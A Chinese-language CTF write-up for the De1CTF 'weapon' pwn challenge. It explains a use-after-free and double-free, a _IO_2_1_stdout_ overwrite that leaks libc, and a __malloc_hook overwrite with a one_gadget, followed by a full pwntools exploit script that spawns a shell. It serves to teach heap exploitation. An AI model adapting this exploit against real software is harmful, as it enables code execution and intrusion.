De1ctf收获:用_IO_2_1_stdout_泄露libc地址 weapon的writeup
GitHub
例行公事
可以看出保护全开
进行分析
可以发现程序功能很简单
- create
- delete
- rename
create
限定大小最大只能是0x60
index只能是0-9但是是自个输入的
存在一个结构,struct[0] = size,struct[1] = ptr
readn函数没有用\x00截断
delete
中间index的判断有问题,且存在uaf
rename
根据之前存储的size和ptr进行读取
利用方法
- 申请多个块,且在块中构造块
create(0x10,0,p64(0)+p64(0x41))
create(0x60,1,'a'*0x20+p64(0)+p64(0x41))
create(0x30,2,'a')
create(0x30,3,'a')
create(0x30,4,'a')
- 因为要利用uaf漏洞,所以要让块进入fastbin链表,且0x60的块也必须进入fastbin链表,为了之后的利用
delete(1)
delete(2)
delete(3)
- 利用idx为3的块的指针,分配块到我们构造的假块上,修改idx为1的块的size,再次将其free,这时候idx为1的块在fastbin的0x60的链表中,同时也在unsorted bin的链表中,因此其fd与bk都存放着libc的地址
rename(3,'\x10')
create(0x30,3,'a')
create(0x30,2,p64(0))
rename(2,p64(0)+p64(0xb1))
delete(1) #为了让这一步顺利,要绕过prev_inuse(nextchunk) == 1,所以块的大小要构造好
- 再把块的size改回来,同时将libc地址的最低两字节覆盖成_IO_2_1_stdout_附近的地址,该地址存在一个size为0x7f的块,同时该块的data与足以覆盖我们想要覆盖的结构
rename(2,p64(0)+p64(0x71))
rename(1,'\xdd\xa5') #因为只有低三位是确定的,这一步需要运气,成功的机率为1/16
create(0x60,4,'')
- 分配块到该区域,同时覆盖目标结构的flag以及_IO_write_base,详情看大佬的博客,得到libc地址
https://hpasserby.me/post/8e1cd5dc.html#泄露libc
create(0x60,5,'') #0xfbad1800
rename(5,'aaa'+p64(0)*6+p64(0xfbad1800)+p64(0)*3+'\x00')
io.recv(0x40)
libc_base = u64(io.recv(8))-(0x7f35bc64a600-0x7f35bc285000) #这里在gdb中用查看一下当前libc基地址然后算一下偏移就得到了
libc.address = libc_base
log.success('libc base:'+hex(libc_base))
one_gadget = libc_base + 0xf1147
- 用double free漏洞,分配块到malloc_hook
create(0x60,0,'a',1)
create(0x60,1,'a',1)
delete(0,1)
delete(1,1)
delete(0,1)
create(0x60,0,p64(libc.symbols['__malloc_hook']-0x13),1)
create(0x60,1,'a',1)
create(0x60,1,'a',1)
create(0x60,2,'a'*0x3+p64(one_gadget),1)
- 触发malloc,getshell
exp:
from pwn import *
context(arch='amd64',os='linux',log_level='debug')
io = 0
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
def create(size,idx,name,choice=0):
if choice == 0:
io.recvuntil('choice >> \n')
io.sendline('1')
io.recvuntil('wlecome input your size of weapon: ')
io.sendline(str(size))
io.recvuntil('input index: ')
io.sendline(str(idx))
io.recvuntil('input your name:\n')
io.sendline(name)
else:
io.recvuntil('choice >> ')
io.sendline('1')
io.recvuntil('wlecome input your size of weapon: ')
io.sendline(str(size))
io.recvuntil('input index: ')
io.sendline(str(idx))
io.recvuntil('input your name:')
io.sendline(name)
def delete(idx,choice=0):
if choice == 0:
io.recvuntil('choice >> \n')
io.sendline('2')
io.recvuntil('input idx :')
io.sendline(str(idx))
else:
io.recvuntil('choice >> ')
io.sendline('2')
io.recvuntil('input idx :')
io.sendline(str(idx))
def rename(idx,content):
io.recvuntil('choice >> \n')
io.sendline('3')
io.recvuntil('input idx: ')
io.sendline(str(idx))
io.recvuntil('new content:\n')
io.send(content)
def main():
global io
io = process('./pwn')
#io = remote('139.180.216.34',8888)
create(0x10,0,p64(0)+p64(0x41))
create(0x60,1,'a'*0x20+p64(0)+p64(0x41))
create(0x30,2,'a')
create(0x30,3,'a')
create(0x30,4,'a')
delete(1)
delete(2)
delete(3)
rename(3,'\x10')
create(0x30,3,'a')
create(0x30,2,p64(0))
rename(2,p64(0)+p64(0xb1))
delete(1)
rename(2,p64(0)+p64(0x71))
rename(1,'\xdd\xa5')
create(0x60,4,'')
create(0x60,5,'') #0xfbad1800
rename(5,'aaa'+p64(0)*6+p64(0xfbad1800)+p64(0)*3+'\x00')
io.recv(0x40)
libc_base = u64(io.recv(8))-(0x7f35bc64a600-0x7f35bc285000)
libc.address = libc_base
log.success('libc base:'+hex(libc_base))
one_gadget = libc_base + 0xf1147
create(0x60,0,'a',1)
create(0x60,1,'a',1)
delete(0,1)
delete(1,1)
delete(0,1)
create(0x60,0,p64(libc.symbols['__malloc_hook']-0x13),1)
create(0x60,1,'a',1)
create(0x60,1,'a',1)
create(0x60,2,'a'*0x3+p64(one_gadget),1)
io.sendline('1')
io.sendline('2')
io.sendline('3')
io.sendline('cat flag')
io.interactive()
if __name__ == '__main__':
while True:
try:
main()
break
except:
io.kill()
#io.close()
continue